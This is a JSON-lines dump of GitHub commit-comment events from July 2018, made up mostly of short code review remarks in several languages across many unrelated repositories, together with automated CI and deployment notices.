{"id":"7978086710","type":"CommitCommentEvent","actor":{"login":"wangqing1218"},"repo":{"name":"HellsingAshen/vector_c"},"payload":{"comment":{"id":29738121,"position":83,"line":83,"path":"tc_vector/vectorc.c","commit_id":"6d1d7b34ba0ff7a426028d1ece1cbfe222051ad1","created_at":"2018-07-17T17:12:58Z","updated_at":"2018-07-17T17:12:58Z","author_association":"NONE","body":"we should call **printf** in buiness code."}},"created_at":"2018-07-17T17:12:58Z"}
{"id":"7978090083","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"i-shiryaev/thinknetica-ruby"},"payload":{"comment":{"id":29738127,"position":5,"line":5,"path":"Lesson_2/3.rb","commit_id":"25fe0aa6f93cfa1bf40f6c081cdeab59b196ba26","created_at":"2018-07-17T17:13:38Z","updated_at":"2018-07-17T17:13:38Z","author_association":"NONE","body":"Тут лучше использовать цикл while. И перезаписывать next_element снаружи цикла. Тогда ясней видно условие выхода, потому-что сейчас в четвертой строке четыре оператора и их гораздо дольше сканировать и оценивать у какого из них выше приоритет. А так у тебя в одной строке будет получение следующего элкмента, а в другой добавление его в массив"}},"created_at":"2018-07-17T17:13:38Z"}
{"id":"7978092664","type":"CommitCommentEvent","actor":{"login":"wangqing1218"},"repo":{"name":"HellsingAshen/vector_c"},"payload":{"comment":{"id":29738132,"position":113,"line":113,"path":"tc_vector/vectorc.c","commit_id":"6d1d7b34ba0ff7a426028d1ece1cbfe222051ad1","created_at":"2018-07-17T17:14:09Z","updated_at":"2018-07-17T17:14:09Z","author_association":"NONE","body":"we should return a status code."}},"created_at":"2018-07-17T17:14:09Z"}
{"id":"7978093685","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"i-shiryaev/thinknetica-ruby"},"payload":{"comment":{"id":29738134,"position":1,"line":1,"path":"Lesson_2/4.rb","commit_id":"25fe0aa6f93cfa1bf40f6c081cdeab59b196ba26","created_at":"2018-07-17T17:14:21Z","updated_at":"2018-07-17T17:14:21Z","author_association":"NONE","body":"хэшу лучше задавать так vowels_hash = {}"}},"created_at":"2018-07-17T17:14:21Z"}
{"id":"7978097252","type":"CommitCommentEvent","actor":{"login":"wangqing1218"},"repo":{"name":"HellsingAshen/vector_c"},"payload":{"comment":{"id":29738147,"position":159,"line":159,"path":"tc_vector/vectorc.c","commit_id":"6d1d7b34ba0ff7a426028d1ece1cbfe222051ad1","created_at":"2018-07-17T17:15:05Z","updated_at":"2018-07-17T17:15:05Z","author_association":"NONE","body":"I think ***2** is better than **<1**."}},"created_at":"2018-07-17T17:15:05Z"}
{"id":"7978097417","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29738148,"position":null,"line":null,"path":null,"commit_id":"a1482e3c2f79f84ae9c7fd6efb448541f0ee71b3","created_at":"2018-07-17T17:15:07Z","updated_at":"2018-07-17T17:15:07Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#ci-495](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#ci-495).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-495-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-17T17:15:07Z"}
{"id":"7978104537","type":"CommitCommentEvent","actor":{"login":"jaycedowell"},"repo":{"name":"nithyanandan/EPIC"},"payload":{"comment":{"id":29738162,"position":null,"line":null,"path":null,"commit_id":"3c32418c59d1df48c66a5f2bc817d7c01003fec3","created_at":"2018-07-17T17:16:29Z","updated_at":"2018-07-17T17:16:29Z","author_association":"COLLABORATOR","body":"Yeah, I don't know of any spare matrix support inside bifrost.  Writing a new bifrost block is not that hard, though.  The `fdmt` and `fir` blocks are good examples of how to write simple blocks.  A lot of what goes into writing the block is the data type/space/size checking and the initial setup of any internal variables needed."}},"created_at":"2018-07-17T17:16:29Z"}
{"id":"7978105771","type":"CommitCommentEvent","actor":{"login":"johnsonw"},"repo":{"name":"whamcloud/integrated-manager-for-lustre"},"payload":{"comment":{"id":29738163,"position":null,"line":null,"path":null,"commit_id":"b551b7ae73ef569ea8397a8a09ab31647b611374","created_at":"2018-07-17T17:16:43Z","updated_at":"2018-07-17T17:16:43Z","author_association":"CONTRIBUTOR","body":"Linting?"}},"created_at":"2018-07-17T17:16:43Z"}
{"id":"7978106068","type":"CommitCommentEvent","actor":{"login":"xoxuewei"},"repo":{"name":"FBU2018-L3/1-Up"},"payload":{"comment":{"id":29738164,"position":12,"line":12,"path":"One-Up/app/src/main/java/com/l3/one_up/model/Event.java","commit_id":"ac4bff82fdbc95b9ebc4c7361c1a0e0027341c84","created_at":"2018-07-17T17:16:46Z","updated_at":"2018-07-17T17:16:46Z","author_association":"NONE","body":"Can we keep the variable name consistent? In general, we want to be as clear and consistent with variable names + field names as possible. \r\n\r\nSo instead of \"KEY_INPUT\", maybe use \"KEY_INPUT_TYPE\""}},"created_at":"2018-07-17T17:16:46Z"}
{"id":"7978109622","type":"CommitCommentEvent","actor":{"login":"wangqing1218"},"repo":{"name":"HellsingAshen/vector_c"},"payload":{"comment":{"id":29738171,"position":289,"line":289,"path":"tc_vector/vectorc.c","commit_id":"6d1d7b34ba0ff7a426028d1ece1cbfe222051ad1","created_at":"2018-07-17T17:17:27Z","updated_at":"2018-07-17T17:17:27Z","author_association":"NONE","body":"OMG...."}},"created_at":"2018-07-17T17:17:27Z"}
{"id":"7978110146","type":"CommitCommentEvent","actor":{"login":"RandyCalderon"},"repo":{"name":"RandyCalderon/front-end-project-week"},"payload":{"comment":{"id":29738173,"position":null,"line":null,"path":null,"commit_id":"8ea3bea8208adc437d4aaa7f4644996fc0a7f121","created_at":"2018-07-17T17:17:33Z","updated_at":"2018-07-17T17:17:33Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [View an existing note](https://trello.com/c/qCGfJr4L/3-view-an-existing-note)"}},"created_at":"2018-07-17T17:17:33Z"}
{"id":"7978112557","type":"CommitCommentEvent","actor":{"login":"fischerwb"},"repo":{"name":"HelloFax/erlmld"},"payload":{"comment":{"id":29738180,"position":14,"line":96,"path":"src/erlmld_runner.erl","commit_id":"5f7d5776fb4cc1a3633d41fdd7f96d901e2f0d0f","created_at":"2018-07-17T17:18:02Z","updated_at":"2018-07-17T17:18:02Z","author_association":"NONE","body":"Line 95, should be path, not Path.\r\nShould file existence be checked?  If not there, use default?"}},"created_at":"2018-07-17T17:18:02Z"}
{"id":"7978113604","type":"CommitCommentEvent","actor":{"login":"LuxCore"},"repo":{"name":"TinaGVI/job4j"},"payload":{"comment":{"id":29738184,"position":4,"line":4,"path":"src/ru/job4j/calculate/Calculate.java","commit_id":"3c57413ed5843792f026f91c75141c2e75092717","created_at":"2018-07-17T17:18:14Z","updated_at":"2018-07-17T17:18:14Z","author_association":"NONE","body":"Пробел нужно убрать после названия метода."}},"created_at":"2018-07-17T17:18:14Z"}
{"id":"7978120305","type":"CommitCommentEvent","actor":{"login":"lbrj1001"},"repo":{"name":"lbrj1001/learngit"},"payload":{"comment":{"id":29738201,"position":null,"line":null,"path":null,"commit_id":"760d884911d1958b680dec3a4d91550426de2895","created_at":"2018-07-17T17:19:35Z","updated_at":"2018-07-17T17:19:35Z","author_association":"OWNER","body":"this is myself from home"}},"created_at":"2018-07-17T17:19:35Z"}
{"id":"7978124680","type":"CommitCommentEvent","actor":{"login":"wangqing1218"},"repo":{"name":"HellsingAshen/vector_c"},"payload":{"comment":{"id":29738212,"position":11,"line":11,"path":"tc_vector/vectorc.h","commit_id":"6d1d7b34ba0ff7a426028d1ece1cbfe222051ad1","created_at":"2018-07-17T17:20:28Z","updated_at":"2018-07-17T17:20:28Z","author_association":"NONE","body":"Maybe this will be better.\r\n```c\r\ntypedef void (*Obj_Destruct_Func_Type)(void*);\r\n```"}},"created_at":"2018-07-17T17:20:28Z"}
{"id":"7978131151","type":"CommitCommentEvent","actor":{"login":"beenotung"},"repo":{"name":"extesy/erlang_js"},"payload":{"comment":{"id":29738219,"position":null,"line":null,"path":null,"commit_id":"cf8b829e21b973603bbdfff7656f02e168b96e98","created_at":"2018-07-17T17:21:46Z","updated_at":"2018-07-17T17:21:46Z","author_association":"NONE","body":"IMO, to use atom 'nil', 'undefined', or throw error, this is arguable.\r\nSince if the node program is receiving 'nil' from the server, it should be a normal atom 'nil', just like other atom.\r\nIn this case, converting undefined to atom 'nil' is a 'lossy' approach."}},"created_at":"2018-07-17T17:21:46Z"}
{"id":"7978131993","type":"CommitCommentEvent","actor":{"login":"locutus2"},"repo":{"name":"VoyagerOne/Stockfish"},"payload":{"comment":{"id":29738221,"position":null,"line":null,"path":null,"commit_id":"ba3e0ec011776ecf2fbc96859e50772ee23f42e0","created_at":"2018-07-17T17:21:56Z","updated_at":"2018-07-17T17:21:56Z","author_association":"NONE","body":"Fine. I approved. This mcp stuff seems interesting. Good luck for your tests. "}},"created_at":"2018-07-17T17:21:56Z"}
{"id":"7978132487","type":"CommitCommentEvent","actor":{"login":"fokkonaut"},"repo":{"name":"fokkonaut/DDNetPP"},"payload":{"comment":{"id":29738222,"position":null,"line":null,"path":null,"commit_id":"3a8c0f780167e5030f1d9c78577b4db1f1677064","created_at":"2018-07-17T17:22:02Z","updated_at":"2018-07-17T17:22:02Z","author_association":"OWNER","body":"i did not use weapon shot as detector, i now used the key press. its better because then you need to click FIRE (mosue1) 2 times. before you could hold spread gun and would swap 100 times in a sec between ghost active and ghost deactive\r\n"}},"created_at":"2018-07-17T17:22:02Z"}
{"id":"7978134177","type":"CommitCommentEvent","actor":{"login":"tswast"},"repo":{"name":"Noremac201/python-docs-samples"},"payload":{"comment":{"id":29738223,"position":39,"line":39,"path":"composer/workflows/kubernetes_pod_operator_sample.py","commit_id":"ec19a29b8e1c120d59416c4b4e7b98d074cb6b7c","created_at":"2018-07-17T17:22:20Z","updated_at":"2018-07-17T17:22:20Z","author_association":"NONE","body":"\"since 'volume'\" ? Do you mean \"since the deploy type is 'volume'\"?"}},"created_at":"2018-07-17T17:22:20Z"}
{"id":"7978137573","type":"CommitCommentEvent","actor":{"login":"tswast"},"repo":{"name":"Noremac201/python-docs-samples"},"payload":{"comment":{"id":29738231,"position":41,"line":41,"path":"composer/workflows/kubernetes_pod_operator_sample.py","commit_id":"ec19a29b8e1c120d59416c4b4e7b98d074cb6b7c","created_at":"2018-07-17T17:23:00Z","updated_at":"2018-07-17T17:23:00Z","author_association":"NONE","body":"Does the secret have to already have been created outside of this dag via kubectl?"}},"created_at":"2018-07-17T17:23:00Z"}
{"id":"7978140964","type":"CommitCommentEvent","actor":{"login":"d3pl0y3r"},"repo":{"name":"zettamax/webrtc-ip-logger"},"payload":{"comment":{"id":29738241,"position":null,"line":null,"path":null,"commit_id":"493f6359ffef6d4b4bb446a76ce1418595979220","created_at":"2018-07-17T17:23:40Z","updated_at":"2018-07-17T17:23:40Z","author_association":"COLLABORATOR","body":"```{\n  \"internalIPs\": [\n    \"192.168.0.10\"\n  ],\n  \"externalIPs\": {\n    \"ipv4\": [\n      \"95.222.25.62\"\n    ],\n    \"ipv6\": [\n      \"2a02:908:2212:6800:6163:3229:4a79:29cf\"\n    ]\n  },\n  \"userAgent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36\"\n}\n```"}},"created_at":"2018-07-17T17:23:40Z"}
{"id":"7978141154","type":"CommitCommentEvent","actor":{"login":"vsbogd"},"repo":{"name":"opencog/relex"},"payload":{"comment":{"id":29738242,"position":41,"line":89,"path":"src/java/relex/corpus/DocSplitterOpenNLP15Impl.java","commit_id":"915c5d417ae3df0577608eba1a93924a7a2ea0d6","created_at":"2018-07-17T17:23:42Z","updated_at":"2018-07-17T17:23:42Z","author_association":"CONTRIBUTOR","body":"Taking into account initialize() is private and called from constructor only, englishModelFilename is always null at this point."}},"created_at":"2018-07-17T17:23:42Z"}
{"id":"7978142315","type":"CommitCommentEvent","actor":{"login":"wimglenn"},"repo":{"name":"pypa/wheel"},"payload":{"comment":{"id":29738244,"position":null,"line":null,"path":null,"commit_id":"50e11a0c10ad33eea4e887ea0c1fb6133f0a74d8","created_at":"2018-07-17T17:23:55Z","updated_at":"2018-07-17T17:23:55Z","author_association":"CONTRIBUTOR","body":"Sorry to be a pedant, but unfortunately even with these latest changes the library is still generating `Provides-Extra: test` duplicate lines in `METADATA`.  I will provide another PR with the fix."}},"created_at":"2018-07-17T17:23:55Z"}
{"id":"7978142868","type":"CommitCommentEvent","actor":{"login":"tswast"},"repo":{"name":"Noremac201/python-docs-samples"},"payload":{"comment":{"id":29738245,"position":58,"line":58,"path":"composer/workflows/kubernetes_pod_operator_sample.py","commit_id":"ec19a29b8e1c120d59416c4b4e7b98d074cb6b7c","created_at":"2018-07-17T17:24:01Z","updated_at":"2018-07-17T17:24:01Z","author_association":"NONE","body":"Since this sample isn't for basic DAG construction, you can delete this comment."}},"created_at":"2018-07-17T17:24:01Z"}
{"id":"7978144805","type":"CommitCommentEvent","actor":{"login":"arcarlsonNPS"},"repo":{"name":"CCRP-Adaptation/RSS-Plots"},"payload":{"comment":{"id":29738250,"position":null,"line":null,"path":null,"commit_id":"38065015a6f4fa84e41165d6578bdf144cecc86e","created_at":"2018-07-17T17:24:22Z","updated_at":"2018-07-17T17:24:22Z","author_association":"CONTRIBUTOR","body":"Updated MACA parsing script, formatted for RSS"}},"created_at":"2018-07-17T17:24:22Z"}
{"id":"7978145218","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29738251,"position":null,"line":null,"path":null,"commit_id":"c86f9ddbfc9c5823bde2207dd0a6a7f09c342be2","created_at":"2018-07-17T17:24:27Z","updated_at":"2018-07-17T17:24:27Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#ci-496](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#ci-496).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-496-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-17T17:24:27Z"}
{"id":"7978149476","type":"CommitCommentEvent","actor":{"login":"wangqing1218"},"repo":{"name":"HellsingAshen/vector_c"},"payload":{"comment":{"id":29738261,"position":null,"line":null,"path":null,"commit_id":"6d1d7b34ba0ff7a426028d1ece1cbfe222051ad1","created_at":"2018-07-17T17:25:15Z","updated_at":"2018-07-17T17:25:15Z","author_association":"NONE","body":"In me personal, we should destruct object when the vector destructor is called.\r\nBecause you don't construct the object when the vector constructor is called.\r\nmalloc and free should be pair."}},"created_at":"2018-07-17T17:25:15Z"}
{"id":"7978172023","type":"CommitCommentEvent","actor":{"login":"KamilJerzyWojcik"},"repo":{"name":"KamilJerzyWojcik/ToDoList"},"payload":{"comment":{"id":29738328,"position":null,"line":null,"path":null,"commit_id":"f1ed49193bc53447f3e0ea28c3e3ab7304c8b25d","created_at":"2018-07-17T17:29:27Z","updated_at":"2018-07-17T17:29:27Z","author_association":"OWNER","body":"@pwasilewski-netcode\r\nWarsztaty"}},"created_at":"2018-07-17T17:29:27Z"}
{"id":"7978173751","type":"CommitCommentEvent","actor":{"login":"JanOonk"},"repo":{"name":"VictorJuliani/chartjs-plugin-zoom"},"payload":{"comment":{"id":29738330,"position":null,"line":null,"path":null,"commit_id":"2666a2c203348b6f97b1b995619cbc77cca00911","created_at":"2018-07-17T17:29:45Z","updated_at":"2018-07-17T17:29:45Z","author_association":"NONE","body":"ok cool. that I can confirm works.\r\nI found out it's a limitation of zoom plugin that uses Hammer, and this library only works with LMB on non-touch devices.\r\nI had several problems with the zoom plugin and I hacked together a version that has multiple fixes gathered from you and pending PR's from multiple sources.\r\n\r\n *  Patched with:\r\n *   - Double Tap to zoom-in\r\n *   - Allow Pan and Zoom on no-touch devices\r\n *   - Fix for zooming above max (by Jan Oonk)\r\n *   - Fix for Drag to zoom outside chart https://github.com/chartjs/chartjs-plugin-zoom/pull/150\r\n *   - Fix: new zoomed area is exactly the same as the dragged to zoom area https://github.com/chartjs/chartjs-plugin-zoom/pull/155\r\n\r\nStill one bug where you zoom in and out doesn't work all the time with rangeLimits.\r\nI have attached my patched version. Sorry for not making GIT PR's and stuff. I am pretty new to GIT and have multiple deadlines.\r\n\r\n[chartjs-plugin-zoom.zip](https://github.com/VictorJuliani/chartjs-plugin-zoom/files/2202682/chartjs-plugin-zoom.zip)\r\n\r\n\r\n"}},"created_at":"2018-07-17T17:29:45Z"}
{"id":"7978174759","type":"CommitCommentEvent","actor":{"login":"tswast"},"repo":{"name":"Noremac201/python-docs-samples"},"payload":{"comment":{"id":29738333,"position":90,"line":90,"path":"composer/workflows/kubernetes_pod_operator_sample.py","commit_id":"ec19a29b8e1c120d59416c4b4e7b98d074cb6b7c","created_at":"2018-07-17T17:29:56Z","updated_at":"2018-07-17T17:29:56Z","author_association":"NONE","body":"If the Pod fails to create, will the task show as failed in Airflow? Will the logs appear in the task logs or do we have to debug using kubectl commands?"}},"created_at":"2018-07-17T17:29:56Z"}
{"id":"7978175820","type":"CommitCommentEvent","actor":{"login":"ViktoriyaRyazhska"},"repo":{"name":"ViktoriyaRyazhska/Lv-329.JavaCore"},"payload":{"comment":{"id":29738335,"position":9,"line":9,"path":"week_three/les6/EX1HW/Chicken.java","commit_id":"8169bd1722ee3b00cf3799e8e9dc362edaac722f","created_at":"2018-07-17T17:30:08Z","updated_at":"2018-07-17T17:30:08Z","author_association":"OWNER","body":" для чого нам тут локальні змінні, може краше відразу\r\nSystem.out.println(\"Has a red feathers. \");"}},"created_at":"2018-07-17T17:30:08Z"}
{"id":"7978176787","type":"CommitCommentEvent","actor":{"login":"ViktoriyaRyazhska"},"repo":{"name":"ViktoriyaRyazhska/Lv-329.JavaCore"},"payload":{"comment":{"id":29738338,"position":14,"line":14,"path":"week_three/les6/EX1HW/Chicken.java","commit_id":"8169bd1722ee3b00cf3799e8e9dc362edaac722f","created_at":"2018-07-17T17:30:17Z","updated_at":"2018-07-17T17:30:17Z","author_association":"OWNER","body":"те саме"}},"created_at":"2018-07-17T17:30:17Z"}
{"id":"7978177158","type":"CommitCommentEvent","actor":{"login":"alldine"},"repo":{"name":"minglich/logitech-pubg"},"payload":{"comment":{"id":29738339,"position":null,"line":null,"path":null,"commit_id":"8ed6f4f02965f2e555303811ad28d14b047f52d4","created_at":"2018-07-17T17:30:21Z","updated_at":"2018-07-17T17:30:21Z","author_association":"NONE","body":"can we have a recoil option for QBZ? because that weapon is too common now we could find anywhere"}},"created_at":"2018-07-17T17:30:21Z"}
{"id":"7978178996","type":"CommitCommentEvent","actor":{"login":"wahyuade"},"repo":{"name":"shelaernitasari/tabulampot"},"payload":{"comment":{"id":29738347,"position":null,"line":null,"path":null,"commit_id":"5161ca15e282564b42d902bdd9ce67a7ba2ddac5","created_at":"2018-07-17T17:30:40Z","updated_at":"2018-07-17T17:30:40Z","author_association":"NONE","body":"ngerii"}},"created_at":"2018-07-17T17:30:40Z"}
{"id":"7978179343","type":"CommitCommentEvent","actor":{"login":"tswast"},"repo":{"name":"Noremac201/python-docs-samples"},"payload":{"comment":{"id":29738348,"position":98,"line":98,"path":"composer/workflows/kubernetes_pod_operator_sample.py","commit_id":"ec19a29b8e1c120d59416c4b4e7b98d074cb6b7c","created_at":"2018-07-17T17:30:44Z","updated_at":"2018-07-17T17:30:44Z","author_association":"NONE","body":"Are any of these inputs \"templated\" via Jinja2 by Airflow? If so, we should demonstrate that."}},"created_at":"2018-07-17T17:30:44Z"}
{"id":"7978181705","type":"CommitCommentEvent","actor":{"login":"tswast"},"repo":{"name":"Noremac201/python-docs-samples"},"payload":{"comment":{"id":29738353,"position":100,"line":100,"path":"composer/workflows/kubernetes_pod_operator_sample.py","commit_id":"ec19a29b8e1c120d59416c4b4e7b98d074cb6b7c","created_at":"2018-07-17T17:31:09Z","updated_at":"2018-07-17T17:31:09Z","author_association":"NONE","body":"It `True` the default?"}},"created_at":"2018-07-17T17:31:09Z"}
{"id":"7978183032","type":"CommitCommentEvent","actor":{"login":"remoe"},"repo":{"name":"gwaldron/osgearth"},"payload":{"comment":{"id":29738355,"position":5,"line":19,"path":"src/osgEarthDrivers/cache_rocksdb/CMakeLists.txt","commit_id":"3d0d8d75f2dda7bf64521f72bc3a08f2bc62d6ab","created_at":"2018-07-17T17:31:23Z","updated_at":"2018-07-17T17:31:23Z","author_association":"CONTRIBUTOR","body":"Yes, you're right, this changes has nothing to do with my PR. Sorry."}},"created_at":"2018-07-17T17:31:23Z"}
{"id":"7978183211","type":"CommitCommentEvent","actor":{"login":"jordan-massingill"},"repo":{"name":"LambdaSchool/User-Interface-Project-Week"},"payload":{"comment":{"id":29738356,"position":null,"line":null,"path":null,"commit_id":"ccb2f3fb66f47f2428c2906eecd77a3bbdaf3ae1","created_at":"2018-07-17T17:31:24Z","updated_at":"2018-07-17T17:31:24Z","author_association":"NONE","body":" Build layout HTML/LESS: Home page desktop design\r\nBuild layout HTML/LESS: Home page mobile design\r\nBuild layout HTML/LESS: Services page desktop design only\r\nBuild layout HTML/LESS/JavaScript: Navigation system design\r\n\r\n    Non-expanded View Design: When the navigation is not active, it should be fixed to the top of the page at all times\r\n    Expanded View Design: When a user clicks on the navigation icon a full page overlay will pop over all the content on the page. The navigation icon will be replaced by a close icon. The user must click the close icon to return back to browsing the website. The home and services pages need to be linked together using tags. You must use your own custom JavaScript for the opening and closing functionality, no bootstrap allowed for functionality on this feature \r\n\r\nBuild Custom Component HTML/LESS/JavaScript: Services page tab navigator design\r\n\r\n    Using the assets provided, you must build the tab navigator using your own custom JavaScript component, no libraries allowed on this feature. You are encouraged to use code from previous weeks to accomplish this feature \r\n\r\n\r\n\r\n"}},"created_at":"2018-07-17T17:31:24Z"}
{"id":"7978183768","type":"CommitCommentEvent","actor":{"login":"breandan"},"repo":{"name":"duckietown/gym-duckietown"},"payload":{"comment":{"id":29738358,"position":24,"line":24,"path":"docker/amod/server/Dockerfile","commit_id":"e3ff93e3c464259f47f7ee0bb560792b4e0a46d7","created_at":"2018-07-17T17:31:31Z","updated_at":"2018-07-17T17:31:31Z","author_association":"MEMBER","body":"For reproducible builds, I usually try to avoid `git clone ...` from unstable branches in the `Dockerfile`, or if possible, pin it with a specific tag or release version. Alternately, we can use [`FROM duckietown/slimremote-base`](https://hub.docker.com/r/duckietown/slimremote-base/) as a base image or [`COPY --from source_dir`](https://docs.docker.com/develop/develop-images/multistage-build/#use-an-external-image-as-a-stage). This is fine for now, but we should think about moving to a more stable version."}},"created_at":"2018-07-17T17:31:31Z"}
{"id":"7978184982","type":"CommitCommentEvent","actor":{"login":"fichtner"},"repo":{"name":"opnsense/core"},"payload":{"comment":{"id":29738360,"position":7,"line":144,"path":"src/opnsense/mvc/app/library/OPNsense/Backup/Nextcloud.php","commit_id":"50fb5bcb0c8f1c97653acd282394bdadb4e9b9ce","created_at":"2018-07-17T17:31:43Z","updated_at":"2018-07-17T17:31:43Z","author_association":"MEMBER","body":"Sorry guys, not sure how this slipped through the lint check. Must be getting old :(\n\n> On 17. Jul 2018, at 18:12, Fabian Franz BSc <notifications@github.com> wrote:\n> \n> @AdSchellevis except for the typo in the commit message: 👍\n> \n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub, or mute the thread.\n"}},"created_at":"2018-07-17T17:31:43Z"}
{"id":"7978185102","type":"CommitCommentEvent","actor":{"login":"ViktoriyaRyazhska"},"repo":{"name":"ViktoriyaRyazhska/Lv-329.JavaCore"},"payload":{"comment":{"id":29738361,"position":4,"line":4,"path":"week_three/les6/EX1HW/FlyingBird.java","commit_id":"8169bd1722ee3b00cf3799e8e9dc362edaac722f","created_at":"2018-07-17T17:31:45Z","updated_at":"2018-07-17T17:31:45Z","author_association":"OWNER","body":"може цей клас теж зробити абстрактним, оді не потрібно буде методи з порожньою реалізацією типу \r\nvoid feathers() { }"}},"created_at":"2018-07-17T17:31:45Z"}
{"id":"7978186008","type":"CommitCommentEvent","actor":{"login":"bbdaiya"},"repo":{"name":"shivam-munchi/newsApp"},"payload":{"comment":{"id":29738364,"position":12,"line":12,"path":"app/src/main/java/com/example/delhivery/newsapp/ApiClient.java","commit_id":"edd7adb61705cbfb31a6414ecc3f751c312cf6d1","created_at":"2018-07-17T17:31:55Z","updated_at":"2018-07-17T17:31:55Z","author_association":"NONE","body":"Retrofit has interceptor to add headers like apiKey here."}},"created_at":"2018-07-17T17:31:55Z"}
{"id":"7978186629","type":"CommitCommentEvent","actor":{"login":"ViktoriyaRyazhska"},"repo":{"name":"ViktoriyaRyazhska/Lv-329.JavaCore"},"payload":{"comment":{"id":29738365,"position":3,"line":3,"path":"week_three/les6/EX1HW/NonFlyingBird.java","commit_id":"8169bd1722ee3b00cf3799e8e9dc362edaac722f","created_at":"2018-07-17T17:32:02Z","updated_at":"2018-07-17T17:32:02Z","author_association":"OWNER","body":"те саме"}},"created_at":"2018-07-17T17:32:02Z"}
{"id":"7978196742","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29738378,"position":null,"line":null,"path":null,"commit_id":"2d029a9105e631b293db1cc4d3b6c052b5769b82","created_at":"2018-07-17T17:33:53Z","updated_at":"2018-07-17T17:33:53Z","author_association":"NONE","body":"develop (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2339 of 2339 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2d029a9105e631b293db1cc4d3b6c052b5769b82-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2d029a9105e631b293db1cc4d3b6c052b5769b82-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-17T17:33:53Z"}
{"id":"7978198673","type":"CommitCommentEvent","actor":{"login":"neverpanic"},"repo":{"name":"macports/macports-ports"},"payload":{"comment":{"id":29738379,"position":null,"line":null,"path":null,"commit_id":"a4e16dbb046d89f9146dbc9408f2bfb96ec73a82","created_at":"2018-07-17T17:34:14Z","updated_at":"2018-07-17T17:34:14Z","author_association":"MEMBER","body":"I cannot reproduce your issue on High Sierra 10.13.6. I also checked the source code of jack2 for uses of `vDSP_vadd` and found that to correctly include `Accelerate/Accelerate.h`. This must be a problem on your side, as it works fine on my machine.\r\n\r\nWhether MacPorts is \"ready for High Sierra\" is unrelated to whether all ports will build (or work) on High Sierra. MacPorts itself has no problems operating on High Sierra, and ports only get fixed when somebody puts in the time to do so. Assuming that somebody else will eventually fix your issue for you will not help you."}},"created_at":"2018-07-17T17:34:14Z"}
{"id":"7978202879","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29738388,"position":null,"line":null,"path":null,"commit_id":"e5ce16bb0b3c1d388aa1661b2e410a8459c5b6af","created_at":"2018-07-17T17:35:00Z","updated_at":"2018-07-17T17:35:00Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#ci-497](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#ci-497).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-497-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-17T17:35:00Z"}
{"id":"7978206928","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29738399,"position":null,"line":null,"path":null,"commit_id":"b33d184787bd542cfd1442c335fcaefe5907d64c","created_at":"2018-07-17T17:35:43Z","updated_at":"2018-07-17T17:35:43Z","author_association":"OWNER","body":"Created multidev environment [dgreat#ci-798](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#ci-798).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-798-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-17T17:35:43Z"}
{"id":"7978210499","type":"CommitCommentEvent","actor":{"login":"bbdaiya"},"repo":{"name":"shivam-munchi/newsApp"},"payload":{"comment":{"id":29738405,"position":26,"line":26,"path":"app/src/main/java/com/example/delhivery/newsapp/DetailActivity.java","commit_id":"edd7adb61705cbfb31a6414ecc3f751c312cf6d1","created_at":"2018-07-17T17:36:23Z","updated_at":"2018-07-17T17:36:23Z","author_association":"NONE","body":"There are libraries which download the image with its url and handle everything( compress and all). Easy to use. Check picasso and glide."}},"created_at":"2018-07-17T17:36:23Z"}
{"id":"7978211032","type":"CommitCommentEvent","actor":{"login":"ViktoriyaRyazhska"},"repo":{"name":"ViktoriyaRyazhska/Lv-329.JavaCore"},"payload":{"comment":{"id":29738408,"position":15,"line":15,"path":"HomeWork6/Task2/Main.java","commit_id":"85dc5e06507525c1d902c58b5afb2b06bc98de6b","created_at":"2018-07-17T17:36:29Z","updated_at":"2018-07-17T17:36:29Z","author_association":"OWNER","body":"якщо зробити, щоб клас Employee implements Calculate, то нам тут не треба було би приводити типи"}},"created_at":"2018-07-17T17:36:29Z"}
